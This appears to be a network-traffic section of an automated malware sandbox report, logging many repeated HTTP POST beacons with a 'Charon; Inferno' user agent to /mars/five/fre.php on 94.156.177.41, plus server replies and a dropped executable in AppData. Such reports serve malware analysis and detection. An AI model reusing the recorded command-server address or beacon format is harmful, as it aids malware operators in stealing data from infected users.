                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
                    Source: C:\Users\user\AppData\Roaming\mexnJkivovwH.exeCode function: 13_2_00404ED4 recv,13_2_00404ED4
                    Source: unknownHTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
